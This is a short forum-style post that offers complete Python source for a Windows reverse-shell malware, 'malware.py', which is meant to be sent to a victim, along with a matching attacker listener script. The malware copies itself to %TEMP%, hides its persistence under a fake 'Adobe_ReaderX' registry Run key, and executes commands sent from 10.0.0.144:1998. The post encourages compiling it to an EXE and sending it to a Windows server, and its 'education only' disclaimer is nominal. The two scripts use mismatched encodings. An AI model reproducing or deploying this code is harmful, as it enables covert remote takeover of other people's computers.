Reverse Shell tutorial
This post was last modified over a year ago and as such, information in it may be outdated (or the post may be outright broken).
Hey Guys, Finlay Here
Today I present you a reverse shell script I've build during some boredom.
I have the proof that it works here:
View the Proof!Here is the "malware.py" (which you send to the victim):
# Please support me and my development by making a donation to:
# BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
os.system('copy %s %s'%(fileName, tempdir))
# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
key = OpenKey(HKEY_LOCAL_MACHINE, run)
runkey =[]
try:
i = 0
while True:
subkey = EnumValue(key, i)
runkey.append(subkey[0])
i += 1
except WindowsError:
pass
# If the autorun key "Adobe ReaderX" isn't set this will set the key:
if 'Adobe ReaderX' not in runkey:
try:
key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
key.Close()
except WindowsError:
pass
def shell():
#Base64 encoded reverse shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.144', int(1998)))
s.send('[*] Connection Established!')
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
encoded = base64.b64encode(stdout_value)
s.send(encoded)
#s.send(stdout_value)
s.close()
def main():
tempdir = '%TEMP%'
fileName = sys.argv[0]
run = "Software\Microsoft\Windows\CurrentVersion\Run"
autorun(tempdir, fileName, run)
shell()
if __name__ == "__main__":
main()Please note that you need to have to chance the IP and port to suit your scenario.
Also here is the command.py (which should be running on your box!)
import socket
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 1998))
s.listen(2)
print "Listening on port 1998... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip
while True:
command = raw_input('~$ ')
encode = bytearray(command)
for i in range(len(encode)):
encode[i] ^=0x41
client.send(encode)
en_data=client.recv(2048)
decode = bytearray(en_data)
for i in range(len(decode)):
decode[i] ^=0x41
print decode
client.close()
s.close()
so these scripts are build fairly easily, and probably not very effective.
build when you build them to an EXE (PyInstaller anyone?), send them to a windows server, and boom, you're a god now! (sorta...)Please use these scripts for education only!
I'm not going to help you if you get in trouble!
Comments
Leave a comment
Please login to leave comment!